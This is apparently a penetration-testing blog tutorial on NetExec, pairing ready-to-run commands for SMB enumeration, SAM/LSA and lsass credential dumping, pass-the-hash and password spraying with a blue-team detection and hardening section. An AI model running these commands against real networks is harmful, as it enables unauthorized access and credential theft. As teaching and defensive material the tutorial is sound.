NetExec (CrackMapExec) in Practice: SMB Enumeration, SAM Dumping, and Password Spraying

Tools & Defense
2025.12.25
Time it takes to read this article 7 minutes.

Legal & Ethical Disclaimer. Everything below is for education and authorized penetration testing only. Run these tools exclusively against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is a crime in virtually every jurisdiction (e.g., the U.S. Computer Fraud and Abuse Act, the UK Computer Misuse Act). You are responsible for staying inside the boundaries of your scope.

Introduction / Overview

NetExec (the nxc binary) is the community-maintained successor to CrackMapExec (CME). After the original CME project went quiet, the community forked and revitalized it under the NetExec name. It is the Swiss-army knife for network-level Active Directory and SMB assessments: a single tool that authenticates across hundreds of hosts, enumerates shares, dumps credentials, and runs a large catalogue of post-exploitation modules.

In this article you'll learn how to drive the SMB protocol handler (nxc smb), enumerate shares with --shares, dump local credentials with --sam, run a safe password spray, and load modules for deeper enumeration. We'll close with a Detection & Defense section so blue teams can spot and break these techniques.

How it works / Background

NetExec is a protocol-oriented framework. You pick a protocol — smb, winrm, ldap, mssql, rdp, ssh, ftp, wmi, nfs, or vnc — and supply targets plus credentials. Under the hood it leans on Impacket for the wire protocols.

For SMB, authentication happens over NTLM or Kerberos. NetExec spins up an SMB session, runs whatever action you requested, and prints a color-coded result line per host. A (Pwn3d!) tag means the credentials grant local-admin-equivalent access (you can write to ADMIN$), which is the prerequisite for --sam, --lsa, and command execution.

Credentials can be supplied as a cleartext password (-p), an NTLM hash for pass-the-hash (-H), or a Kerberos ticket (-k with KRB5CCNAME). The same syntax works whether you target one host or a whole /24.

Prerequisites / Lab setup

Build an isolated lab — never test on production. A minimal range:

  • One Windows Server 2019/2022 domain controller (CORP.LOCAL).
  • One or two domain-joined Windows 10/11 workstations.
  • A Kali Linux attacker box on the same segment.

Install NetExec on Kali. The recommended path is pipx to avoid dependency conflicts:

# Install via pipx (recommended)
pipx install git+https://github.com/Pennyw0rth/NetExec

# Or on recent Kali
sudo apt update && sudo apt install netexec

# Verify
nxc --version
nxc smb --help
Bash

NetExec stores results in a local database. You can inspect harvested hosts, credentials, and shares later with nxcdb.

Attack walkthrough / PoC

1. Host discovery and null sessions

Point NetExec at a subnet with no credentials to fingerprint hosts. The banner reveals hostname, domain, OS build, SMB signing status, and SMBv1 support:

# Sweep a /24 — name, domain, OS, signing, SMBv1
nxc smb 10.10.10.0/24
Bash

A line like signing:False is a flag for relay attacks; SMBv1:True hints at legacy, often-vulnerable hosts. Try an anonymous (null) or guest session to enumerate without credentials:

# Null session — list shares the anonymous user can see
nxc smb 10.10.10.50 -u '' -p '' --shares

# Guest account often allowed even when null is not
nxc smb 10.10.10.50 -u 'guest' -p '' --shares
Bash

2. Authenticated SMB enumeration with --shares

Once you have a valid domain account, --shares lists every share and your effective READ/WRITE permissions — the fastest way to find open file shares full of sensitive data:

# Enumerate shares + access rights across the subnet
nxc smb 10.10.10.0/24 -u jdoe -p 'Summer2025!' --shares
Bash

Other high-value enumeration flags using the same session:

# Logged-on users, local users, password policy, and a RID brute force
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --loggedon-users
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --users
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --pass-pol
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --rid-brute 5000

# Recursively spider a share for interesting files
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' -M spider_plus -o DOWNLOAD_FLAG=False
Bash

3. Dumping credentials with --sam and --lsa

When NetExec reports (Pwn3d!), you have local admin. Now you can dump the local SAM database (local account NTLM hashes) over \\host\ADMIN$ via remote registry, exactly like Impacket's secretsdump:

# Dump local SAM hashes (requires admin / Pwn3d!)
nxc smb 10.10.10.50 -u administrator -p 'P@ssw0rd!' --sam

# Dump LSA secrets (cached domain creds, service account passwords, DPAPI keys)
nxc smb 10.10.10.50 -u administrator -p 'P@ssw0rd!' --lsa
Bash

Those NT hashes feed straight into pass-the-hash. NetExec accepts the hash with -H:

# Pass-the-hash across the subnet to find where this local admin hash is valid
nxc smb 10.10.10.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'
Bash

This is classic lateral movement via shared local-admin passwords — the exact problem LAPS was built to solve.

4. Password spraying

A password spray tries one password against many accounts to avoid lockouts. Always check the lockout policy first (--pass-pol) and stay well under the lockoutThreshold. Feed NetExec a list of users and a single password:

# One password, many users — pass --continue-on-success to test every account
nxc smb 10.10.10.50 -u users.txt -p 'Spring2025!' --continue-on-success

# Spray a previously dumped hash against the domain
nxc smb dc01.corp.local -u users.txt -H '<ntlmhash>' --continue-on-success
Bash

Without --continue-on-success, NetExec stops at the first valid pair (useful when you just need one foothold). Valid results print in green and are saved to the nxcdb database for reuse.

5. Modules

Modules extend NetExec well beyond built-in flags. List and inspect them:

nxc smb -L                    # list all SMB modules
nxc smb -M lsassy --options   # show a module's options
Bash

High-impact examples:

# Pull lsass credentials in-memory (no minidump on disk)
nxc smb 10.10.10.50 -u administrator -p 'P@ssw0rd!' -M lsassy

# Enumerate Group Policy Preferences passwords (MS14-025 / cpassword)
nxc smb 10.10.10.0/24 -u jdoe -p 'Summer2025!' -M gpp_password

# Check for ZeroLogon (CVE-2020-1472) without exploiting
nxc smb dc01.corp.local -u '' -p '' -M zerologon

# Check for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' -M printnightmare
Bash

For more on abusing the hashes you collect, see my notes on Pass-the-Hash and NTLM relay and Kerberoasting.

Attack flow

NetExec (CrackMapExec) in Practice: SMB Enumeration, SAM Dumping, and Password Spraying diagram 1

The diagram shows the loop from unauthenticated discovery, through credential acquisition and spraying, to dumping hashes and pivoting with pass-the-hash until a privileged foothold is reached.

Detection & Defense (Blue Team)

NetExec is loud if you know where to listen. Mitigations carry equal weight to the offense.

1. Watch the authentication logs. Password spraying generates many 4625 (failed logon) events with LogonType 3 (network) from a single source IP across many usernames in a short window. A correlation rule on "N distinct target accounts from one source within M minutes" catches most sprays. Successful spray hits show as 4624 with the same network logon type.

2. Detect remote SAM/LSA dumping. --sam and --lsa work through the Remote Registry service and ADMIN$. Hunt for:

  • 5145 (detailed file share access) referencing ADMIN$ plus winreg/svcctl named pipes.
  • 4624 LogonType 3 with admin accounts immediately followed by service-control activity.
  • lsassy/lsass access maps to MITRE T1003.001 (LSASS Memory); deploy Credential Guard and an EDR rule on suspicious lsass.exe handle requests.

3. Kill the prerequisites.

  • Enforce SMB signing (RequireSecuritySigning = 1) to neutralize NTLM relay; the signing:False banner is your audit target.
  • Disable SMBv1 entirely (Set-SmbServerConfiguration -EnableSMB1Protocol $false).
  • Deploy Windows LAPS so every machine has a unique local admin password — this breaks the pass-the-hash lateral-movement loop that NetExec exploits.
  • Restrict null/anonymous sessions: set RestrictAnonymous / RestrictAnonymousSAM = 1 and RestrictRemoteSAM (the O:BAG:BAD:(A;;RC;;;BA) SDDL) so --rid-brute and anonymous --shares fail.

4. Patch the modules' targets. ZeroLogon (CVE-2020-1472) and PrintNightmare (CVE-2021-34527) are detected and exploited by NetExec modules — apply the August 2020 and July 2021 patches, and remediate MS14-025 GPP cpassword by removing legacy Groups.xml files.

5. Account hardening. Set a sensible account lockout policy (e.g., 10 attempts / 15-minute window) to blunt spraying, enable MFA on remote access, and alert on logons from non-standard subnets.

These map to MITRE ATT&CK T1110.003 (Password Spraying), T1021.002 (SMB/Admin Shares), T1003 (OS Credential Dumping), and T1135 (Network Share Discovery) — build detections per technique.

Conclusion

NetExec consolidates host discovery, share enumeration, credential dumping, password spraying, and a rich module ecosystem into one nxc command. For attackers it compresses hours of manual Impacket work into a single line; for defenders, every action it performs leaves a recognizable trail. Master the offensive workflow, then close the loop by enforcing SMB signing, deploying LAPS and Credential Guard, restricting anonymous access, and alerting on the logon patterns above. Tooling is neutral — operational discipline is what keeps you on the right side of the engagement.

References

Comments

Copied title and URL